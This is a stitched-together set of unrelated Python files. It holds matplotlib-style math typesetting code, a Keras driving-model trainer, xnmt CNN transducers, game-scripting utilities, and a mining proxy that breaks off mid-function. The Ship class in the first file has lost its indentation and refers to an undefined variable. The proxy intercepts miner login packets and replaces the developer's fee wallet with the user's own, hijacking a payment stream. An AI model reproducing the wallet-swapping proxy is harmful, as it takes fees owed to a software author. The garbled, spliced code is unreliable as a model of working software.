# copy() before mutating (see Glue.shrink / Glue.grow).
GlueSpec._types = {
    'fil': GlueSpec(0., 1., 1, 0., 0),
    'fill': GlueSpec(0., 1., 2, 0., 0),
    'filll': GlueSpec(0., 1., 3, 0., 0),
    'neg_fil': GlueSpec(0., 0., 0, 1., 1),
    'neg_fill': GlueSpec(0., 0., 0, 1., 2),
    'neg_filll': GlueSpec(0., 0., 0, 1., 3),
    'empty': GlueSpec(0., 0., 0, 0., 0),
    'ss': GlueSpec(0., 1., 1, -1., 1),
}
# Some convenient ways to get common kinds of glue
# (each subclass simply binds one of the named GlueSpec._types entries).
class Fil(Glue):
    def __init__(self):
        Glue.__init__(self, 'fil')
class Fill(Glue):
    def __init__(self):
        Glue.__init__(self, 'fill')
class Filll(Glue):
    def __init__(self):
        Glue.__init__(self, 'filll')
class NegFil(Glue):
    def __init__(self):
        Glue.__init__(self, 'neg_fil')
class NegFill(Glue):
    def __init__(self):
        Glue.__init__(self, 'neg_fill')
class NegFilll(Glue):
    def __init__(self):
        Glue.__init__(self, 'neg_filll')
class SsGlue(Glue):
    # 'ss' glue stretches and shrinks symmetrically (used for centering).
    def __init__(self):
        Glue.__init__(self, 'ss')
class HCentered(Hlist):
    """
    A convenience class to create an :class:`Hlist` whose contents are
    centered within its enclosing box.
    """
    def __init__(self, elements):
        # The surrounding 'ss' glue absorbs slack equally on both sides;
        # kerning is disabled since glue separates the characters anyway.
        Hlist.__init__(self, [SsGlue()] + elements + [SsGlue()],
                       do_kern=False)
class VCentered(Vlist):
    """
    A convenience class to create a :class:`Vlist` whose contents are
    centered within its enclosing box.
    """
    def __init__(self, elements):
        # FIX: the base class was declared as Hlist while __init__ invoked
        # Vlist.__init__ -- under Python 2's unbound-method rules that call
        # raises TypeError (self is not a Vlist), and even if it ran, the
        # isinstance(p, Hlist) dispatch in Ship would route this vertical
        # list through hlist_out.  The docstring and the Vlist.__init__
        # call both indicate Vlist is the intended base.
        Vlist.__init__(self, [SsGlue()] + elements + [SsGlue()])
class Kern(Node):
    """
    Fixed spacing of *width* (normally negative) between adjacent items.
    In a horizontal list this corrects the distance between letter pairs
    such as A and V, per the font designer's kerning tables; in a vertical
    list the *width* acts as additional vertical spacing.
    """
    def __init__(self, width):
        Node.__init__(self)
        self.width = width

    def __repr__(self):
        return "k%.02f" % self.width

    def shrink(self):
        Node.shrink(self)
        # Stop scaling once the smallest size level is reached.
        if self.size < NUM_SIZE_LEVELS:
            self.width = self.width * SHRINK_FACTOR

    def grow(self):
        Node.grow(self)
        self.width = self.width * GROW_FACTOR
class SubSuperCluster(Hlist):
    """
    A workaround for the single-pass parse (unlike TeX's two passes):
    keeps the nucleus, sub- and super-script alongside the packed hlist so
    that a script attached later can reconfigure the cluster on the fly.
    """
    def __init__(self):
        # Start as an empty hlist; the parser fills the slots in later.
        Hlist.__init__(self, [])
        self.nucleus = None
        self.sub = None
        self.super = None
class AutoHeightChar(Hlist):
    """
    :class:`AutoHeightChar` will create a character as close to the
    given height and depth as possible. When using a font with
    multiple height versions of some characters (such as the BaKoMa
    fonts), the correct glyph will be selected, otherwise this will
    always just return a scaled version of the glyph.
    """
    def __init__(self, c, height, depth, state, always=False):
        # NOTE: `always` is accepted but unused in this implementation.
        alternatives = state.font_output.get_sized_alternatives_for_symbol(
            state.font, c)
        state = state.copy()
        target_total = height + depth
        # Stop at the first alternative tall enough; otherwise `char`
        # keeps the last candidate tried.
        for fontname, sym in alternatives:
            state.font = fontname
            char = Char(sym, state)
            if char.height + char.depth >= target_total:
                break
        # Scale the chosen glyph to the exact target size.
        # NOTE(review): assumes `alternatives` is non-empty and the chosen
        # glyph has nonzero height+depth; otherwise this raises
        # NameError / ZeroDivisionError -- confirm upstream guarantees.
        factor = target_total / (char.height + char.depth)
        state.fontsize *= factor
        char = Char(sym, state)
        # Shift so the glyph's depth lines up with the requested depth.
        shift = (depth - char.depth)
        Hlist.__init__(self, [char])
        self.shift_amount = shift
class AutoWidthChar(Hlist):
    """
    :class:`AutoWidthChar` will create a character as close to the
    given width as possible. When using a font with multiple width
    versions of some characters (such as the BaKoMa fonts), the
    correct glyph will be selected, otherwise this will always just
    return a scaled version of the glyph.
    """
    def __init__(self, c, width, state, always=False, char_class=Char):
        # NOTE: `always` is accepted but unused in this implementation.
        alternatives = state.font_output.get_sized_alternatives_for_symbol(
            state.font, c)
        state = state.copy()
        # Stop at the first alternative wide enough; otherwise `char`
        # keeps the last candidate tried.
        for fontname, sym in alternatives:
            state.font = fontname
            char = char_class(sym, state)
            if char.width >= width:
                break
        # Scale the chosen glyph to the exact target width.
        # NOTE(review): assumes `alternatives` is non-empty and the chosen
        # glyph has nonzero width; otherwise this raises
        # NameError / ZeroDivisionError -- confirm upstream guarantees.
        factor = width / char.width
        state.fontsize *= factor
        char = char_class(sym, state)
        Hlist.__init__(self, [char])
        self.width = char.width
class Ship:
"""
Once the boxes have been set up, this sends them to output. Since
boxes can be inside of boxes inside of boxes, the main work of
:class:`Ship` is done by two mutually recursive routines,
:meth:`hlist_out` and :meth:`vlist_out`, which traverse the
:class:`Hlist` nodes and :class:`Vlist` nodes inside of horizontal
and vertical boxes. The global variables used in TeX to store
state as it processes have become member variables here.
"""
def __call__(self, renderer, ox, oy, box):
self.max_push = 0 # Deepest nesting of push commands so far
self.cur_s = 0
self.cur_v = 0.
self.cur_h = 0.
self.off_h = ox
self.off_v = oy + box.height
self.hlist_out(renderer, box)
def clamp(value):
if value < -1000000000.:
return -1000000000.
if value > 1000000000.:
return 1000000000.
return value
clamp = staticmethod(clamp)
def hlist_out(self, renderer, box):
cur_g = 0
cur_glue = 0.
glue_order = box.glue_order
glue_sign = box.glue_sign
base_line = self.cur_v
left_edge = self.cur_h
self.cur_s += 1
self.max_push = max(self.cur_s, self.max_push)
clamp = self.clamp
for p in box.children:
if isinstance(p, Char):
p.render(renderer, self.cur_h + self.off_h, self.cur_v + self.off_v)
self.cur_h += p.width
elif isinstance(p, Kern):
self.cur_h += p.width
elif isinstance(p, List):
# node623
if len(p.children) == 0:
self.cur_h += p.width
else:
edge = self.cur_h
self.cur_v = base_line + p.shift_amount
if isinstance(p, Hlist):
self.hlist_out(renderer, p)
else:
# p.vpack(box.height + box.depth, 'exactly')
self.vlist_out(renderer, p)
self.cur_h = edge + p.width
self.cur_v = base_line
elif isinstance(p, Box):
# node624
rule_height = p.height
rule_depth = p.depth
rule_width = p.width
if math.isinf(rule_height):
rule_height = box.height
if math.isinf(rule_depth):
rule_depth = box.depth
if rule_height > 0 and rule_width > 0:
self.cur_v = baseline + rule_depth
p.render(renderer,
self.cur_h + self.off_h,
self.cur_v + self.off_v,
rule_width, rule_height)
self.cur_v = baseline
self.cur_h += rule_width
elif isinstance(p, Glue):
# node625
glue_spec = p.glue_spec
rule_width = glue_spec.width - cur_g
if glue_sign != 0: # normal
if glue_sign == 1: # stretching
if glue_spec.stretch_order == glue_order:
cur_glue += glue_spec.stretch
cur_g = round(clamp(float(box.glue_set) * cur_glue))
elif glue_spec.shrink_order == glue_order:
cur_glue += glue_spec.shrink
cur_g = round(clamp(float(box.glue_set) * cur_glue))
rule_width += cur_g
self.cur_h += rule_width
self.cur_s -= 1
def vlist_out(self, renderer, box):
    """
    Lay out and render the children of a vertical list *box*.

    Walks ``box.children`` top to bottom, advancing ``self.cur_v`` and
    rendering rule Boxes at the current offsets; Glue is resolved against
    the box's glue set/sign/order.  Char nodes are illegal in a vlist.
    """
    cur_g = 0        # rounded glue adjustment applied so far
    cur_glue = 0.    # accumulated stretch/shrink amount seen so far
    glue_order = box.glue_order
    glue_sign = box.glue_sign
    self.cur_s += 1
    self.max_push = max(self.max_push, self.cur_s)
    left_edge = self.cur_h
    # Start from the top of the box.
    self.cur_v -= box.height
    top_edge = self.cur_v
    clamp = self.clamp
    for p in box.children:
        if isinstance(p, Kern):
            # In a vlist, a kern's "width" is a vertical displacement.
            self.cur_v += p.width
        elif isinstance(p, List):
            if len(p.children) == 0:
                self.cur_v += p.height + p.depth
            else:
                self.cur_v += p.height
                self.cur_h = left_edge + p.shift_amount
                save_v = self.cur_v
                p.width = box.width
                if isinstance(p, Hlist):
                    self.hlist_out(renderer, p)
                else:
                    self.vlist_out(renderer, p)
                # Restore and move past the sub-list's depth.
                self.cur_v = save_v + p.depth
                self.cur_h = left_edge
        elif isinstance(p, Box):
            rule_height = p.height
            rule_depth = p.depth
            rule_width = p.width
            # An infinite width means "fill the enclosing box".
            if math.isinf(rule_width):
                rule_width = box.width
            rule_height += rule_depth
            if rule_height > 0 and rule_depth > 0:
                self.cur_v += rule_height
                p.render(renderer,
                         self.cur_h + self.off_h,
                         self.cur_v + self.off_v,
                         rule_width, rule_height)
        elif isinstance(p, Glue):
            # In a vlist, glue "width" acts along the vertical axis.
            glue_spec = p.glue_spec
            rule_height = glue_spec.width - cur_g
            if glue_sign != 0:  # normal
                if glue_sign == 1:  # stretching
                    if glue_spec.stretch_order == glue_order:
                        cur_glue += glue_spec.stretch
                        cur_g = round(clamp(float(box.glue_set) * cur_glue))
                elif glue_spec.shrink_order == glue_order:  # shrinking
                    cur_glue += glue_spec.shrink
                    cur_g = round(clamp(float(box.glue_set) * cur_glue))
            rule_height += cur_g
            self.cur_v += rule_height
        elif isinstance(p, Char):
            raise RuntimeError("Internal mathtext error: Char node found in vlist")
    self.cur_s -= 1
ship = Ship() |
import csv
import random
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten, Lambda
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.preprocessing.image import img_to_array, load_img
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
# Constants
steering_offset = 0.3
data_path = "data/"
# Load the data and offset the steering on left and right images.
def get_image_path_and_labels(data_file):
    """
    Read a driving-log CSV and return ``(img_paths, steering_angles)``.

    For every row the center, left and right camera image paths are added,
    and the steering angle is shifted by ``+steering_offset`` (left camera)
    and ``-steering_offset`` (right camera) so the side cameras act as
    recovery training data.
    """
    img_paths, steering_angles = [], []
    with open(data_file) as fin:
        reader = csv.reader(fin)
        # Skip the header row directly instead of carrying a skip flag.
        next(reader, None)
        for center_img, left_img, right_img, steering_angle, _throttle, _brake, _speed in reader:
            # Add the center, left, and right image paths.
            img_paths += [center_img.strip(), left_img.strip(), right_img.strip()]
            # Apply the steering offset for the side cameras.
            angle = float(steering_angle)
            steering_angles += [angle, angle + steering_offset, angle - steering_offset]
    return img_paths, steering_angles
# Process the image
def process_image(image_path, steering_angle):
    """Load the image at *image_path* as a 100x100x3 array and return it with its angle."""
    # Down-scaling at load time keeps training fast.
    loaded = load_img(image_path, target_size=(100,100,3))
    return img_to_array(loaded), steering_angle
# Generator
def generator(batch_size, x, y):
    """
    Infinite training-batch generator.

    Randomly samples `batch_size` (path, angle) pairs and, for each one,
    also appends a horizontally flipped copy with a negated steering angle
    to balance left/right turns — so each yielded batch actually contains
    2 * batch_size samples.
    """
    while 1:
        batch_x, batch_y = [], []
        for i in range(batch_size):
            index = random.randint(0, len(x) - 1)
            steering_angle = y[index]
            image, steering_angle = process_image(data_path + x[index], steering_angle)
            batch_x.append(image)
            batch_y.append(steering_angle)
            # Also add to the batch a flipped version of the image.
            image_flipped = np.fliplr(image)
            steering_angle_flipped = -steering_angle
            batch_x.append(image_flipped)
            batch_y.append(steering_angle_flipped)
        yield np.array(batch_x), np.array(batch_y)
# Define the training model.
def model(shape):
    """
    Build and compile the steering-angle regression network.

    Five conv+max-pool blocks followed by a fully connected head with a
    single linear output; compiled with MSE loss and the Adam optimizer.
    """
    # We must use SAME padding so the output size isn't reduced too small
    # before flattening the network.
    border_mode = 'same'
    net = Sequential()
    # Normalize pixel values into [-0.5, 0.5].
    net.add(Lambda(lambda x: (x / 255.0) - 0.5, input_shape=shape, output_shape=shape))
    # Convolutional feature extractor: each block is conv(relu) + 2x2 pool.
    for n_filters, kernel in ((24, 5), (36, 5), (48, 5), (64, 3), (64, 3)):
        net.add(Convolution2D(n_filters, kernel, kernel,
                              activation='relu', border_mode=border_mode))
        net.add(MaxPooling2D())
    net.add(Flatten())
    # Fully connected head with dropout between the wide layers.
    for units in (1164, 100, 50):
        net.add(Dense(units, activation='relu'))
        net.add(Dropout(0.35))
    net.add(Dense(10, activation='relu'))
    net.add(Dense(1, activation='linear'))
    net.compile(loss='mse', optimizer="adam")
    return net
# Train the model.
def train():
    """Build the network, load and split the driving data, train, and save model.h5."""
    net = model(shape=(100,100,3))
    # Print the structure of the network.
    for layer in net.layers:
        print(layer, layer.output_shape)
    # Get the image paths, and steering angles.
    x, y = get_image_path_and_labels(data_path + 'driving_log.csv')
    # Shuffle the data.
    x, y = shuffle(x, y, random_state=42)
    # Split into training and validation sets.
    x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.15, random_state=42)
    # Train the model.  Note: generator() yields 2x its nominal batch size
    # (it appends a flipped copy of each sample).
    net.fit_generator(generator(64, x_train, y_train),
                      validation_data=generator(64, x_val, y_val),
                      nb_val_samples=12000,
                      samples_per_epoch=48000,
                      nb_epoch=3)
    # Save the model.
    net.save('model.h5')
# Activate this script
# Entry point: train and save the model when run as a script.
if __name__ == '__main__':
    train()
|
<gh_stars>100-1000
from typing import List
import numbers
import xnmt, xnmt.tensor_tools as tt
from xnmt import expression_seqs, param_collections
from xnmt.transducers import base as transducers
from xnmt.persistence import Serializable, serializable_init
if xnmt.backend_dynet:
import dynet as dy
if xnmt.backend_torch:
import torch.nn as nn
@xnmt.require_dynet
class ConvConnectedSeqTransducer(transducers.SeqTransducer, Serializable):
    """
    Input goes through a first convolution in time and space (no stride, so
    the dimension is not reduced), then a per-frame CNN layer several times.
    The output embedding sequence has the same length as the input sequence.

    (Docstring moved before ``yaml_tag`` — previously it was a dead string
    expression, not the class docstring.)
    """
    yaml_tag = '!ConvConnectedSeqTransducer'

    @serializable_init
    def __init__(self,
                 input_dim: numbers.Integral,
                 window_receptor: numbers.Integral,
                 output_dim: numbers.Integral,
                 num_layers: numbers.Integral,
                 internal_dim: numbers.Integral,
                 non_linearity: str = 'linear') -> None:
        """
        Args:
            num_layers: num layers after first receptor conv
            input_dim: size of the inputs
            window_receptor: window for the receptor
            output_dim: size of the outputs
            internal_dim: size of hidden dimension, internal dimension
            non_linearity: non-linearity to apply between layers
        """
        my_params = param_collections.ParamManager.my_params(self)
        self.input_dim = input_dim
        self.window_receptor = window_receptor
        self.internal_dim = internal_dim
        self.non_linearity = non_linearity
        self.output_dim = output_dim
        # Per-activation gain constant.  BUG FIX throughout this class:
        # strings were compared with `is` (object identity), which is
        # unreliable and a SyntaxWarning on Python >= 3.8; use `==`.
        if self.non_linearity == 'linear':
            self.gain = 1.0
        elif self.non_linearity == 'tanh':
            self.gain = 1.0
        elif self.non_linearity == 'relu':
            self.gain = 0.5
        elif self.non_linearity == 'sigmoid':
            self.gain = 4.0
        normalInit = dy.NormalInitializer(0, 0.1)
        # First conv sees the full receptor window over the input dim.
        self.pConv1 = my_params.add_parameters(
            dim=(self.input_dim, self.window_receptor, 1, self.internal_dim),
            init=normalInit)
        self.pBias1 = my_params.add_parameters(dim=(self.internal_dim,))
        # 1x1 convs applied per frame.
        self.builder_layers = []
        for _ in range(num_layers):
            conv = my_params.add_parameters(
                dim=(self.internal_dim, 1, 1, self.internal_dim), init=normalInit)
            bias = my_params.add_parameters(dim=(self.internal_dim,))
            self.builder_layers.append((conv, bias))
        self.last_conv = my_params.add_parameters(
            dim=(self.internal_dim, 1, 1, self.output_dim), init=normalInit)
        self.last_bias = my_params.add_parameters(dim=(self.output_dim,))

    def _apply_non_linearity(self, expr):
        """Apply the configured non-linearity to *expr* ('linear' is identity)."""
        if self.non_linearity == 'tanh':
            return dy.tanh(expr)
        elif self.non_linearity == 'relu':
            return dy.rectify(expr)
        elif self.non_linearity == 'sigmoid':
            return dy.logistic(expr)
        return expr

    def get_final_states(self) -> List[transducers.FinalTransducerState]:
        """Return the final states recorded by the most recent transduce() call."""
        return self._final_states

    def transduce(self, embed_sent: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:
        """Run the convolutional stack; the output sequence has the same length as the input."""
        src = embed_sent.as_tensor()
        sent_len = tt.sent_len(src)
        batch_size = tt.batch_size(src)
        # BUG FIX: was true division `/`, which produces a float in Python 3
        # and is not a valid tensor dimension.
        pad_size = (self.window_receptor - 1) // 2  # TODO adapt it also for even window size
        src = dy.concatenate(
            [dy.zeroes((self.input_dim, pad_size), batch_size=batch_size),
             src,
             dy.zeroes((self.input_dim, pad_size), batch_size=batch_size)], d=1)
        padded_sent_len = sent_len + 2 * pad_size
        conv1 = dy.parameter(self.pConv1)
        bias1 = dy.parameter(self.pBias1)
        src_chn = dy.reshape(src, (self.input_dim, padded_sent_len, 1), batch_size=batch_size)
        cnn_layer1 = dy.conv2d_bias(src_chn, conv1, bias1, stride=[1, 1])
        hidden_layer = dy.reshape(cnn_layer1, (self.internal_dim, sent_len, 1), batch_size=batch_size)
        hidden_layer = self._apply_non_linearity(hidden_layer)
        for conv_hid, bias_hid in self.builder_layers:
            hidden_layer = dy.conv2d_bias(hidden_layer, dy.parameter(conv_hid),
                                          dy.parameter(bias_hid), stride=[1, 1])
            hidden_layer = dy.reshape(hidden_layer, (self.internal_dim, sent_len, 1),
                                      batch_size=batch_size)
            hidden_layer = self._apply_non_linearity(hidden_layer)
        last_conv = dy.parameter(self.last_conv)
        last_bias = dy.parameter(self.last_bias)
        output = dy.conv2d_bias(hidden_layer, last_conv, last_bias, stride=[1, 1])
        output = dy.reshape(output, (sent_len, self.output_dim), batch_size=batch_size)
        output_seq = expression_seqs.ExpressionSequence(expr_tensor=output)
        self._final_states = [transducers.FinalTransducerState(output_seq[-1])]
        return output_seq
@xnmt.require_torch
class MaxPoolCNNLayer(transducers.SeqTransducer, Serializable):
    """
    One layer of CNN + (potentially strided) max-pooling.
    """
    yaml_tag = "!MaxPoolCNNLayer"

    @serializable_init
    def __init__(self,
                 in_channels: numbers.Integral,
                 out_channels: numbers.Integral,
                 kernel_h: numbers.Integral = 1,
                 kernel_w: numbers.Integral = 1,
                 pad_cnn_h: bool = False,
                 pad_cnn_w: bool = False,
                 pool_h: numbers.Integral = 1,
                 pool_w: numbers.Integral = 1,
                 pad_pool_h: bool = False,
                 pad_pool_w: bool = False,
                 stride_h: numbers.Integral = 1,
                 stride_w: numbers.Integral = 1,
                 activation: str = 'selu'):
        """
        Args:
            in_channels: channel count the hidden dimension is split into
            out_channels: output channel count of the convolution
            kernel_h, kernel_w: convolution kernel size
            pad_cnn_h, pad_cnn_w: if True, pad with kernel//2 on that axis
            pool_h, pool_w: max-pooling kernel size
            pad_pool_h, pad_pool_w: if True, pad the pooling with pool//2
            stride_h, stride_w: max-pooling stride
            activation: activation name resolved via tt.activation_by_name
        """
        self.in_channels = in_channels
        self.out_channels = out_channels
        self.activation = activation
        my_params = param_collections.ParamManager.my_params(self)
        self.cnn_layer = nn.Conv2d(in_channels=in_channels,
                                   out_channels=out_channels,
                                   kernel_size=(kernel_h, kernel_w),
                                   padding=(kernel_h // 2 if pad_cnn_h else 0,
                                            kernel_w // 2 if pad_cnn_w else 0)).to(xnmt.device)
        # Pooling is skipped entirely when kernel and stride are all <= 1.
        self.use_pooling = not (pool_h<=1 and pool_w<=1 and stride_h<=1 and stride_w<=1)
        if self.use_pooling:
            self.pooling_layer = nn.MaxPool2d(kernel_size=(pool_h, pool_w),
                                              stride=(stride_h, stride_w),
                                              padding=(pool_h // 2 if pad_pool_h else 0,
                                                       pool_w // 2 if pad_pool_w else 0)).to(xnmt.device)
        # Only the conv layer is registered (max-pooling has no parameters).
        my_params.append(self.cnn_layer)
        self.activation_fct = tt.activation_by_name(activation)

    def transduce(self, x: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:
        """Apply conv (+ optional pooling) and the activation; the output may be subsampled in time."""
        expr = x.as_transposed_tensor()
        batch_size, hidden_dim, seq_len = expr.size()
        # Split the hidden dimension into channels for Conv2d:
        # (batch, hidden, time) -> (batch, C_in, hidden // C_in, time).
        # Assumes hidden_dim is divisible by in_channels — TODO confirm.
        expr = expr.view((batch_size, self.in_channels, hidden_dim//self.in_channels, seq_len))
        expr = self.cnn_layer(expr)
        if self.use_pooling:
            expr = self.pooling_layer(expr)
        expr = self.activation_fct(expr)
        # Fold channels back into a flat hidden dimension.
        batch_size, out_chn, out_h, seq_len = expr.size()
        expr = expr.view((batch_size, out_chn * out_h, seq_len))
        output_seq = expression_seqs.ExpressionSequence(expr_transposed_tensor = expr,
                                                        mask = x.mask.lin_subsampled(trg_len=seq_len) if x.mask else None)
        self._final_states = [transducers.FinalTransducerState(output_seq[-1])]
        return output_seq

    def get_final_states(self) -> List[transducers.FinalTransducerState]:
        """Return the states recorded by the most recent transduce() call."""
        return self._final_states
|
<reponame>nitanmarcel/scripthookvpy3k<gh_stars>10-100
import logging
import os
import pip.commands
import pip.exceptions
import pkg_resources
from gta.exceptions import *
__all__ = ('Message', 'CurlyBracketFormattingAdapter', 'get_directory', 'setup_logging',
'get_logger', 'install_dependency')
class Message:
    """
    Wrap a new-style format string (or any object with a ``__str__``
    method, e.g. an exception) together with its positional arguments so
    formatting is deferred until the message is rendered.

    .. note:: Using keywords in the formatter will not work.

    Arguments:
        - `fmt`: A formatter string or an object that has a __str__
          method.
        - `args`: Arguments that will be passed to the formatter.
    """

    def __init__(self, fmt, args):
        """Store the formatter and its arguments for later rendering."""
        self._fmt = fmt
        self._args = args

    def __str__(self):
        """
        Return a curly-bracket-formatted string, or fall back to the
        wrapped object's own ``__str__`` when it is not a string.
        """
        fmt = self._fmt
        if not isinstance(fmt, str):
            return fmt.__str__()
        return fmt.format(*self._args)
class CurlyBracketFormattingAdapter(logging.LoggerAdapter):
    """
    Logging adapter that enables new-style (curly bracket) message
    formatting by wrapping each message in :class:`Message`.

    Arguments:
        - `logger`: Instance of :class:`logging.Logger`.
        - `extra`: Optional dict-like object that will be passed to
          every log message and can be used for formatting.
    """

    def __init__(self, logger, extra=None):
        """Wrap *logger*; *extra* defaults to an empty dict."""
        super().__init__(logger, extra or {})

    def log(self, level, msg, *args, **kwargs):
        """
        Pass a log message.  Shouldn't be called directly — use the level
        methods instead (e.g. info, warning, etc.).
        """
        if not self.isEnabledFor(level):
            return
        msg, kwargs = self.process(msg, kwargs)
        # noinspection PyProtectedMember
        self.logger._log(level, Message(msg, args), (), **kwargs)
def get_directory():
    """Return the absolute path of the ``python`` directory under the current working directory."""
    scripts_dir = os.path.join(os.getcwd(), 'python')
    return os.path.abspath(scripts_dir)
def setup_logging(console):
    """
    Set up logging formatter, handler and levels for the `gta`, `pip`
    and related loggers.

    Arguments:
        - `console`: Use console logging instead of file logging.
    """
    # One shared handler: console stream or log file.
    if console:
        handler = logging.StreamHandler()
    else:
        handler = logging.FileHandler('scripthookvpy3k.log')
    handler.setFormatter(logging.Formatter(
        fmt='{asctime} {name:<22} {levelname:<18} {message}',
        datefmt='%Y-%m-%d %H:%M:%S',
        style='{'
    ))
    # Redirect warnings.warn() output into the logging system.
    logging.captureWarnings(True)
    # Attach the handler and set per-logger levels.
    logger_levels = (
        ('gta', logging.DEBUG),
        ('py.warnings', logging.WARNING),
        ('asyncio', logging.INFO),
        ('pip', logging.WARNING),
    )
    for name, level in logger_levels:
        configured = logging.getLogger(name)
        configured.setLevel(level)
        configured.addHandler(handler)
def get_logger(name='gta'):
    """
    Wrap the curly bracket formatting adapter around a logger.  Should
    always be used instead of ``logging.getLogger``.

    Arguments:
        - `name`: The name of the logger.

    Return the wrapped :class:`logging.Logger` instance.
    """
    plain_logger = logging.getLogger(name)
    return CurlyBracketFormattingAdapter(plain_logger)
dependencies_blacklist = {'aiohttp', 'numpy', 'scipy'}
def install_dependency(dependency):
    """
    Install a dependency using :class:`pip` into the scripts directory,
    unless it is already satisfied or blacklisted.

    Arguments:
        - `dependency`: A dependency as a `requirement specifier
          <https://pip.pypa.io/en/latest/reference/pip_install.html#requirement-specifiers>`_.

    Raises:
        - ``DependencyBlacklistedError``: the requirement is listed in
          ``dependencies_blacklist``.
        - ``InstallDependencyError``: pip failed to install it.
    """
    logger = get_logger()
    # Get path
    path = os.path.abspath(get_directory())
    try:
        # Check if dependency is satisfied
        pkg_resources.require(dependency)
    except pkg_resources.ResolutionError:
        # Check if dependency is blacklisted
        for requirement in pkg_resources.parse_requirements(dependency):
            if requirement.project_name in dependencies_blacklist:
                raise DependencyBlacklistedError(dependency)
        try:
            # Install dependency
            message = 'Installing dependency "{}" into path "{}"'
            logger.debug(message, dependency, os.path.relpath(path))
            # NOTE(review): pip.commands is a pip-internal API that was
            # removed in pip >= 10; this only works with old pip versions.
            command = pip.commands.InstallCommand(isolated=True)
            # Note: We can't run 'main' because it overrides our logging settings
            options, args = command.parse_args([
                '--disable-pip-version-check',
                '--upgrade',
                '--target', path,
                dependency
            ])
            command.run(options, args)
        except pip.exceptions.PipError as exc:
            raise InstallDependencyError(dependency) from exc
    else:
        logger.debug('Dependency "{}" already satisfied', dependency)
|
<gh_stars>10-100
#!/usr/bin/python2.7
import sys
import socket
import threading
import json
from collections import OrderedDict
import binascii
import re
import datetime
import time
import argparse
def server_loop(local_host, local_port, remote_host, remote_port):
# create the server object
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# lets see if we can stand up the server
try:
print "Daemon is launched, do not close this windows"
server.bind((local_host, local_port))
except:
print "[!!] Failed to listen on %s:%d" % (local_host, local_port)
print "[!!] Check for other listening sockets or correct permissions"
sys.exit(0)
# listen with 5 backlogged--queued--connections
server.listen(5)
while True:
client_socket, addr = server.accept()
# print out the local connection information
print"[+] Received incomming connections from %s:%d" % (addr[0], addr[1])
# start a new thread to talk to the remote host
proxy_thread = threading.Thread(target=proxy_handler,
args=(client_socket, remote_host, remote_port))
proxy_thread.daemon = False
proxy_thread.start()
def receive_from(connection):
    """
    Drain all currently available data from *connection* and return it.

    NOTE(review): the comment below says "2 second time out", but
    ``settimeout(0)`` actually puts the socket into *non-blocking* mode,
    so recv() raises as soon as no data is ready and the loop ends via
    the except clause.  Confirm whether ``settimeout(2)`` was intended.
    """
    buffer = ""
    # We set a 2 second time out depending on your
    # target this may need to be adjusted
    connection.settimeout(0)
    try:
        # keep reading into the buffer until there's no more data
        # or we time out
        while True:
            data = connection.recv(4096)
            if not data:
                break
            buffer += data
    except:
        # Non-blocking recv() raising (no data ready) is the normal exit
        # path here, not an error.
        pass
    return buffer
# modify any requests destined for the remote host
def request_handler(socket_buffer):
    """
    Rewrite miner->pool authentication packets so the wallet address is
    always ours; all other packets are returned unchanged.

    Relies on the module-level globals ``wallet`` and ``worker_name``
    that are set in main().
    """
    # Here is the good part.
    # If it is an Auth packet:
    if ('submitLogin' in socket_buffer) or ('eth_login' in socket_buffer):
        # Preserve key order so the re-serialized JSON looks like the original.
        json_data = json.loads(socket_buffer, object_pairs_hook=OrderedDict)
        print('[+] Auth in progress with address: ' + json_data['params'][0])
        # If the auth contains an address other than ours:
        if wallet not in json_data['params'][0]:
            print('[*] DevFee Detected - Replacing Address - ' + str(datetime.datetime.now()))
            print('[*] OLD: ' + json_data['params'][0])
            # We replace the address.
            json_data['params'][0] = wallet + worker_name
            print('[*] NEW: ' + json_data['params'][0])
            # Stratum messages are newline-terminated.
            socket_buffer = json.dumps(json_data) + '\n'
    # Packet is forged, ready to send.
    return socket_buffer
# modify any responses destined for the local host
def response_handler(buffer):
    """Pass-through hook for pool->miner traffic; no rewriting is performed."""
    return buffer
def proxy_handler(client_socket, remote_host, remote_port):
    """
    Per-client thread: connect to the remote pool and shuttle traffic in
    both directions, passing each buffer through request_handler /
    response_handler.  Exits the thread when either side disconnects.
    """
    # We prepare the connection
    remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # We will try to connect to the remote pool (up to 3 attempts)
    for attempt_pool in range(3):
        try:
            remote_socket.connect((remote_host, remote_port))
        except:
            print "[!] Impossible to connect to the pool. Try again in few seconds "
            time.sleep(2)
        else:
            # Connection OK
            break
    else:
        # for/else: all three attempts failed.
        print "[!] Impossible initiate connection to the pool. Claymore should reconnect. (Check your internet connection) "+ str(datetime.datetime.now())
        #Closing connection
        client_socket.shutdown(socket.SHUT_RDWR)
        client_socket.close()
        #Exiting Thread
        sys.exit()
    # now let's loop and reading from local, send to remote, send to local
    # rinse wash repeat
    while True:
        # read from local host
        local_buffer = receive_from(client_socket)
        if len(local_buffer):
            # send it to our request handler
            local_buffer = request_handler(local_buffer)
            #print local_buffer
            # Try to send off the data to the remote pool
            try:
                remote_socket.send(local_buffer)
            except:
                print "[!] Sending packets to pool failed."
                time.sleep(0.02)
                print "[!] Connection with pool lost. Claymore should reconnect. (May be temporary) "+ str(datetime.datetime.now())
                #Closing connection
                client_socket.shutdown(socket.SHUT_RDWR)
                client_socket.close()
                #Exiting loop
                break
        # Adding delay to avoid too much CPU Usage
        time.sleep(0.001)
        # receive back the response
        remote_buffer = receive_from(remote_socket)
        if len(remote_buffer):
            # send to our response handler
            remote_buffer = response_handler(remote_buffer)
            #print local_buffer
            # Try to send the response to the local socket
            try:
                client_socket.send(remote_buffer)
            except:
                print('[-] Auth Disconnected - Ending Devfee or stopping mining - ' + str(datetime.datetime.now()))
                client_socket.close()
                break
        # Adding delay to avoid too much CPU Usage
        time.sleep(0.001)
        time.sleep(0.001)
    # Clean exit if we break the loop (terminates only this thread).
    sys.exit()
def main():
    """Parse CLI arguments, extract wallet/rig name, and start the proxy loop."""
    parser = argparse.ArgumentParser(description='')
    parser.add_argument('-o', '--remote-host', dest='remote_host', type=str, default='us1.ethermine.org', help='Hostname of Stratum mining pool')
